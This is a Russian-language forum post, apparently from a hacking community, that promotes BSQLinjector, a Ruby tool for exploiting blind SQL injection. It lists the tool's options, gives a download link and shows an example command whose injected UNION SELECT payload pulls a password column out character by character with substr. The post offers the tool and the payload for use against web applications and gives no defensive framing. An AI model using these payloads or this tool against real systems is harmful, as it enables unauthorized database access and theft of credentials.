BSQLinjector - Blind SQL Injection Exploitation Tool

S.W.A.T._AND_B.R.A.T

S.W.A.T._AND_B.R.A.T

Newbie
11.06.2020
7
0
1
BSQLinjector - инструмент для слепых инъекций SQL
BSQLinjector - это инструмент для эксплуатации слепых SQL-инъекций, написанный на ruby.

Он использует слепой метод для извлечения данных из баз данных SQL. Я рекомендую использовать переключатель «--test», чтобы четко увидеть, как выглядит настроенная полезная нагрузка, прежде чем отправлять ее в приложение.

Параметры:

Код: 
 --file        Mandatory - File containing valid HTTP request and SQL injection
                    point (SQLINJECT). (--file=/tmp/req.txt)
  --pattern        Mandatory - Pattern to look for when query is true.
                    (--pattern=truestatement)
  --prepend        Mandatory - Main payload.
                    (--prepend="abcd'and'a'='b'+union+select+'truestatement'
                    +from+table+where+col%3d'value'+and+substr(password,"
  --append        How to end our payload. For example comment out rest of SQL
                    statement. (--append='#)
  --schar        Character placed around chars. This character is not used while
                    in hex mode. (--schar="'")
  --2ndfile        File containing valid HTTP request used in second order
                    exploitation. (--2ndfile=/tmp/2ndreq.txt)

  --mode        Blind mode to use - (between - b (generates less requests),
                    moreless - a (generates less requests by using "<",
                    ">", "=" characters), like - l (complete bruteforce),
                    equals - e (complete bruteforce)). (--mode=l)
  --hex            Use hex to compare instead of characters.
  --case        Case sensitivity.

  --ssl            Use SSL.
  --proxy        Proxy to use. (--proxy=127.0.0.1:8080)

  --test        Enable test mode. Do not send request, just show full payload.
  --special        Include all special characters in enumeration.
  --start        Start enumeration from specified character. (--start=10)
  --max            Maximum characters to enumerate. (--max=10)
  --timeout        Timeout in waiting for responses. (--timeout=20)
  --only-final    Stop showing each enumerated letter.
  --comma        Encode comma.
  --bracket        Add brackets to the end of substring function. --bracket="))"
  --hexspace    Use space instead of brackets to split hex values.
  --verbose        Show verbose messages.
Пример использования:

Код: 
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'"
--prepend="abcd'and'a'='b'+union+select+'truestatement'
+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
СКАЧАТЬ BSQLINJECTOR
 
Для ответа нужно войти/зарегистрироваться

Об LS-LA

  • Мы, группа единомышленников, основная цель которых повышать уровень знаний и умений.
    Не забывая о материальном благополучии каждого)

About LS-LA

  • We, a group of like-minded people, whose main goal is to increase the level of knowledge and skills.
    Not forgetting about everyone’s material well-being)

Быстрая навигация

Главная Форум

Пользовательское меню

login
Верх Низ